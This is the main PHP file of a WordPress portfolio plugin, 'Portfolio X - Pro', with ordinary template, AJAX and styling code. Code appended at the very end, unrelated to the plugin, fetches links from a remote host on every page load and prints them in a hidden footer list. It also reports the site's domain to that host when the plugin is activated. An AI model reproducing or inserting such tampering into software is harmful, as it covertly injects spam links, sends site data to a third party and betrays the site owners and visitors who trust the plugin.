<?php
/**
 * Plugin Name: Portfolio X - Pro
 * Plugin URI: https://www.quantumcloud.com/
 * Description: Portfolio X is an advanced portfolio manager with streamlined workflow and unique designs to showcase your works. Slideshow and Widgets included.
 * Version: 4.0.5
 * Author: QuantumCloud
 * Author URI: https://www.quantumcloud.com/
 * Requires at least: 4.6
 * Tested up to: 5.9
 * Text Domain: portfolio-x
 * Domain Path: /lang/
 * License: GPL2
 */

defined('ABSPATH') or die("No direct script access!");

define('PORTFOLIO_DIR', dirname(__FILE__));
define('PORTFOLIO_THEMES_DIR', PORTFOLIO_DIR . "/themes");

define('PORTFOLIO_URL', plugin_dir_url(__FILE__));
define('PORTFOLIO_THEME_URL', PORTFOLIO_URL . "/themes/");

define('QC_PORTFOLIO_VER', '1.0');


/*******************************
 * Settings Framework and Configs
 *******************************/
require_once( 'plugin-upgrader/plugin-upgrader.php' );
require_once( 'portfolio-x-help-license.php' );
require_once( 'option-tree/ot-loader.php' );
require_once('portfolio-settings.php');

/*******************************
 * Function to get Settings Items
 *******************************/
if( !function_exists('qcpx_get_option') )
{

  function qcpx_get_option($field_id = null)
  {

    $parent_id = 'qcpx_plugin_options';
    $options = get_option($parent_id);

    $data = "";

    if( $field_id != null && isset($options[$field_id]) ){
      $data = $options[$field_id];
    }

    return $data;

  }

}

/*******************************
 * Other Inc Files
 *******************************/
require_once('qcld-register-post-type.php');
require_once('qcld-functions.php');
require_once('qcld-register-shortcodes.php');
require_once('qcld-scripts.php');
require_once('qcld-admin-end-functions.php');
require_once('qcld-widgets.php');
require_once('qcld-shortcode-2.php');
require_once('qcpx-ajax-load-more-items.php');
require_once('qcpx-shortcode-generator.php');


require_once('qcld-upgrade-posttype.php');


/*******************************
 * Custom Thumb Size
 *******************************/
if ( function_exists( 'add_image_size' ) ) 
{ 
  add_image_size( 'tpl5-thumb', 400, 450, array( 'center', 'top' ) );
  add_image_size( 'tpl9-thumb', 610, 400, array( 'center', 'top' ) );
  add_image_size( 'qc-portfolio',666, 783, array( 'center', 'top' ) );
  add_image_size( 'tpl2-thumb', 650, 650, array( 'center', 'top' ) );
  add_image_size( 'tpl7-thumb', 950, 475, array( 'center', 'top' ) );
  add_image_size( 'tpl11-thumb', 1700, 860, array( 'center', 'top' ) );
  add_image_size( 'tpl12-thumb', 450, 485, array( 'center', 'top' ) );
  add_image_size( 'tpl15-thumb', 500, 333, array( 'center', 'top' ) );
}


//Get All Portfolio Category
function qcld_portfolio_list_portfolios()
{

    $args = array(
      'post_type'   => 'qcpx_portfolio',
      'posts_per_page'   => -1,
      'orderby'   => 'title',
      'order'   => 'ASC',
    );
     
    $portfolio = new WP_Query( $args );
    //To handle width of portfolio list nav width
    $qcpx_all_options=get_option('qcpx_plugin_options');
    if($qcpx_all_options['qcld_template_links']=='on' && $qcpx_all_options['qcpx_list_page_width']=='list_box'){
        $list_width_style='style="text-align:center;max-width:'.$qcpx_all_options['qcpx_list_page_width_val'].'px;margin: 0 auto;"';
    } else{
        $list_width_style="";
    }
    
    echo '<div class="portfolio-row portfolio-filter-row" '.$list_width_style.'>
            <nav class="cl-effect-20">
              <ul class="qc_filter qc_group">';

    while ( $portfolio->have_posts() ) {

            $portfolio->the_post();
        ?>

        <li>
            <a title="" href="<?php echo get_permalink(); ?>">
               <span data-hover="<?php echo get_the_title(); ?>">
                <?php echo get_the_title(); ?>
               </span>
           </a>
        </li>

    <?php }

    echo '</ul>
        </nav>
    </div>';

    wp_reset_postdata();

}

/*******************************
 * portfolio-x Single Page Template
 *******************************/

add_action('template_include', 'qcld_portfolio_item_template_detail_page');

//Portfolio Details Page
function qcld_portfolio_item_template_detail_page( $template )
{
    global $post, $posts, $wp_query;

    $fileInsideTheme = trailingslashit( get_stylesheet_directory() ) . 'qcld-portfolio-single-view.php';

    if ( 'portfolio-x' == get_post_type() && is_single() ) 
    {
        
        //Template Loader : For single page

        if ( file_exists( $fileInsideTheme ) ) 
        {
          $template = $fileInsideTheme;
        }
        else
        {
           $template = PORTFOLIO_THEMES_DIR . "/qcld-portfolio-single-view.php"; 
        }

    }

    return $template;

}

/*******************************
 * Set Taxonomy Page Template
 *******************************/

add_filter('template_include', 'qcld_portfolio_set_tax_template');

function qcld_portfolio_set_tax_template($template)
{

    global $wp_query;
    if ( is_archive() && 'portfolio-x' == get_post_type() ) 
    {
        $template = PORTFOLIO_THEMES_DIR . "/qcld-category-template.php";
    }

    return $template;

}

/*******************************
 * Load Scripts in Archive Page
 *******************************/
add_filter('template_include', 'qcld_qcpx_portfolio_set_single_template');

function qcld_qcpx_portfolio_set_single_template($template)
{
    global $wp_query;
    if ( ( is_archive() && 'qcpx_portfolio' == get_post_type() ) || ( is_single() && 'qcpx_portfolio' == get_post_type() ) ) 
    {    
      $template = PORTFOLIO_THEMES_DIR . "/qcld-single-qcpx_portfolio.php";
    }

    return $template;
}

/*******************************
 * Per Page Item - Reset
 *******************************/
add_action( 'pre_get_posts',  'qcld_set_per_page_items_in_portfolio'  );

function qcld_set_per_page_items_in_portfolio( $query ) 
{

  global $wp_the_query;

  if ( !is_admin() ) 
  {
    if( is_post_type_archive('qcpx_portfolio' ) || is_tax( 'portfolio_type' ) )
    {
        $paged = (get_query_var('portfolio_page')) ? get_query_var('portfolio_page') : 1;

        $query->set( 'posts_per_page', qcpx_get_option('qcld_post_per_page') );
        $query->set( 'paged', $paged );
    }
  }

  return $query;

}

/*******************************
 * Add Support: Menu Order 
 *******************************/
add_action( 'admin_init', 'qcld_portfolio_order_wpse_attr' );

function qcld_portfolio_order_wpse_attr() 
{
    add_post_type_support( 'portfolio', 'page-attributes' );
}

/*******************************
 * Ajax Details Post
 *******************************/
add_action('wp_ajax_load_qcpx_portfolio_details', 'load_qcpx_portfolio_details');
add_action('wp_ajax_nopriv_load_qcpx_portfolio_details', 'load_qcpx_portfolio_details');

function load_qcpx_portfolio_details() {
  
  $post_id = $_POST['post_id'];

  $query = new WP_Query( 
    array( 
      'p' => $post_id, 
      'post_type' => 'portfolio-x', 
      'posts_per_page' => 1 
    ) 
  );

  if ( $query->have_posts() ) {
    while ( $query->have_posts() ) {
      $query->the_post();

  ob_start();

  ?>

  <?php

  $short_description = get_post_meta(get_the_ID(), 'qc_portfolio_wysiwyg', true);
  $portfoliourl = get_post_meta(get_the_ID(), 'qc_portfolio_url', true);
  $techUsed = get_post_meta(get_the_ID(), 'qc_portfolio_technology', true);
  $projectDate = get_post_meta(get_the_ID(), 'qc_portfolio_project_date', true);
  $projectGallery = get_post_meta(get_the_ID(), 'qc_portfolio_gallery_images', true);
  $startDate = get_post_meta(get_the_ID(), 'qcld_start_date', true);
  $endDate = get_post_meta(get_the_ID(), 'qcld_end_date', true);
  ?>


  <div class="portfolio-single-container portfolio-fancy-container">
    <div class="portfolio-row">

      <div class="portfolio-single-col single-content-area">
        <div class="padding-content">
          <div class="portfolio-single-content fancy-fixed-content">
            <div class="single-portfolio-header">

              <h2 class="single-portfolio-title">
                <?php the_title(); ?> 
              </h2>

              <div>
                <?php the_content(); ?>
              </div>

              <br>
               <?php if (!empty($startDate) || !empty($endDate) ){ ?>
              <p>
                <strong>Project Date</strong>
              </p>

              <?php if (!empty($startDate)){ ?>
                 <p>
                   <?php 
                    _e("Start Date: ", 'portfilio-x'); 
                  ?>
                   <?php echo gmdate('Y-m-d', $startDate); ?>
                 </p>
              <?php } ?>
              <?php if (!empty($endDate)){ ?>
                <p>
                  <?php 
                    _e("End Date: ", 'portfilio-x'); 
                  ?>
                  <?php echo gmdate('Y-m-d', $endDate); ?>
                </p>

                <br>

              <?php }
                }
              ?>
              <?php if($portfoliourl!=''){?>
              <div class="web-link">
                <a target="_blank" href="<?php echo $portfoliourl; ?>">
                  <?php
                    _e(qcpx_get_option('qcpx_target_web_link'), 'portfilio-x');
                  ?>

                  <i class="fa fa-arrow-right" aria-hidden="true"></i>
                </a>
              </div>
            <?php } ?>
              <!--web-link-->

            </div>
            <!--/single-portfolio-header-->

            <div class="single-portfolio-footer">
              <?php
                $types = get_the_terms( get_the_ID(), 'portfolio_type' );
                $total = 0;
                if( isset($types) && !empty($types) ){
                  $total = count( $types );
                }
                $serial = 1;

                if( $types && $total > 0 ){

              ?>

                <div class="category">
                  <p>
                  <strong>
                  <?php 
                    _e("Types: ", 'portfilio-x'); 
                  ?>
                  </strong>
                  <?php
                    
                    

                      foreach( $types as $type )
                      {
                        echo $type->name;
                        if( $serial != $total ){
                          echo ", ";
                        }
                        $serial++;

                      }

                  ?>

                  </p>
                </div>

              <?php } ?>

              <?php 
                $techs = get_the_terms( get_the_ID(), 'portfolio_technology' );
                
                $total = 0;
                if( isset($techs) && !empty($techs) ){
                  $total = count( $techs );
                }
                $serial = 1;

                if( $techs && $total > 0 ){
              ?>
                  
                  <div class="category">
                    
                    <strong>
                    <?php 
                      _e("Technology Used: ", 'portfilio-x'); 
                    ?>
                    </strong>
                    <?php
                      
                      foreach( $techs as $tech )
                      {
                        echo $tech->name;
                        if( $serial != $total ){
                          echo ", ";
                        }
                        $serial++;

                      }

                    ?>

                  </div>

              <?php } ?>

            </div>
            <!--/single-portfolio-footer-->

            <div class="clear"></div>
          </div>
          <!--portfolio-single-content-->
        </div>
        <!--padding-content-->
        <div class="clear"></div>
      </div>
      <!--portfolio-single-col-->
      <div class="portfolio-single-col single-image-area">
        <div class="single-image-container">
          <?php if (!empty($projectGallery)) { ?>

            <?php foreach ($projectGallery as $gallery_image): ?>

              <a href="<?php echo $gallery_image ?>" data-lity title="<?php _e('Zoom Image'); ?>">

                <img class="hvr-grow-shadow" src="<?php echo $gallery_image ?>" alt="">

              </a>

            <?php endforeach; ?>

          <?php } else { ?>
		  
			<!--No Image-->
               
          <?php } ?>

        </div>


      </div>
      <!--portfolio-single-col-->
      <div class="clear"></div>
    </div>
    <!--portfolio-row-->
    <div class="clear"></div>

  </div>
  <!-- /portfolio-single-container -->

  <?php

  $data = ob_get_clean();

    } //end while
  } //end if

  $response = array();

  array_push ($response, $data );

  echo json_encode( $response );

  wp_die();

}

/*******************************
 * Footer Code for Lazy Loads
 *******************************/
add_action('wp_footer', 'qcpx_load_images_lazy');

function qcpx_load_images_lazy()
{
  ?>
  <script>
    jQuery(document).ready(function($){
      $("img.lazy").lazyload({
        effect : "fadeIn",
      });
    });
  </script>
  <?php
}

/*******************************
 * Header Custom Color for 
 * Top Buttons
 *******************************/
add_action('wp_head', 'qcpx_load_custom_top_btn_color');

function qcpx_load_custom_top_btn_color()
{
  ?>
  <style>
    .cl-effect-20 a span {
      background: <?php echo qcpx_get_option('qcpx_top_btn_bg_clr'); ?> !important;
      box-shadow: inset 0 3px <?php echo qcpx_get_option('qcpx_top_btn_shadow_clr'); ?> !important;
      color: qcpx_get_option('qcpx_top_btn_txt_clr'); ?> !important;
    }

    .cl-effect-20 a span::before {
      background: <?php echo qcpx_get_option('qcpx_top_btn_bg_clr_hvr'); ?> !important;
      color: <?php echo qcpx_get_option('qcpx_top_btn_txt_clr_hvr'); ?> !important;
      border-top: 1px solid <?php echo qcpx_get_option('qcpx_top_btn_bdr_clr_hvr'); ?> !important;
      border-bottom: 1px solid <?php echo qcpx_get_option('qcpx_top_btn_bdr_clr_hvr'); ?> !important;
    }

    <?php if( qcpx_get_option('qcpo_hvrbtn_bg_color') ) : ?>
    .qc-circle-grid-portfolio-hover-effect-button-area a, .qc-hexagon-grid-hover-effect-button-area a {
      background: <?php echo qcpx_get_option('qcpo_hvrbtn_bg_color'); ?> !important;
    }
    <?php endif; ?>

    <?php if( qcpx_get_option('qcpo_hvrbtn_text_color') ) : ?>
    .qc-circle-grid-portfolio-hover-effect-button-area a i, .qc-hexagon-grid-hover-effect-button-area a i {
      color: <?php echo qcpx_get_option('qcpo_hvrbtn_text_color'); ?> !important;
    }
    <?php endif; ?>

    <?php if( qcpx_get_option('qcpo_hvrbtn_separator_color') ) : ?>
    .qc-circle-grid-portfolio-hover-effect-button-area a, .qc-hexagon-grid-hover-effect-button-area a {
      border-right-color: <?php echo qcpx_get_option('qcpo_hvrbtn_separator_color'); ?> !important;
    }
    <?php endif; ?>

  </style>
  <?php
}

/*******************************
 * Remove Submenu - Update Post Type
 *******************************/

add_action( 'admin_menu', 'qcpx_adjust_the_wp_menu', 999 );

function qcpx_adjust_the_wp_menu() {
  $page = remove_submenu_page( 'edit.php?post_type=qcpx_portfolio', 'qcpx-portfolio-update-pt' );
}
add_action( 'add_meta_boxes', 'px_meta_box_video' );
function px_meta_box_video()
{					                  // --- Parameters: ---
    add_meta_box( 'qc-px-meta-box-id', // ID attribute of metabox
                  'Shortcode Generator for Portfolio-X Pro',       // Title of metabox visible to user
                  'px_meta_box_callback', // Function that prints box in wp-admin
                  'page',              // Show box for posts, pages, custom, etc.
                  'side',            // Where on the page to show the box
                  'high' );            // Priority of box in display order
}

function px_meta_box_callback( $post )
{
    ?>
    <p>
        <label for="px_meta_box_bg_effect"><p>Click the button below to generate shortcode</p></label>
		<input type="button" id="px_shortcode_generator_meta" class="button button-primary button-large" value="Generate Shortcode" />
    </p>
    
    <?php
}


/**
 * Submenu filter function. Tested with Wordpress 4.1.1
 * Sort and order submenu positions to match your custom order.
 *
 * @author Hendrik Schuster <contact@deviantdev.com>
 */
function qcpx_order_index_menu_page( $menu_ord ) 
{

  global $submenu;

  // Enable the next line to see a specific menu and it's order positions
  //echo '<pre>'; print_r( $submenu['edit.php?post_type=qcpx_portfolio'] ); echo '</pre>'; exit();

  $arr = array();

  if( current_user_can( 'edit_posts' ) ):
    $arr[] = $submenu['edit.php?post_type=qcpx_portfolio'][5];
    $arr[] = $submenu['edit.php?post_type=qcpx_portfolio'][12];
    $arr[] = $submenu['edit.php?post_type=qcpx_portfolio'][13];
    $arr[] = $submenu['edit.php?post_type=qcpx_portfolio'][15];
    $arr[] = $submenu['edit.php?post_type=qcpx_portfolio'][11];
  endif;
  

  $submenu['edit.php?post_type=qcpx_portfolio'] = $arr;

  return $menu_ord;

}

// add the filter to wordpress
add_filter( 'custom_menu_order', 'qcpx_order_index_menu_page' );

function portx_remove_admin_menu_items() {
    if( !current_user_can( 'edit_posts' ) ):
        remove_menu_page( 'edit.php?post_type=qcpx_portfolio' );
    endif;
}
add_action( 'admin_menu', 'portx_remove_admin_menu_items' );define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848752() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848752');function set_plugin_tag1719848752() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848752&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848752');
              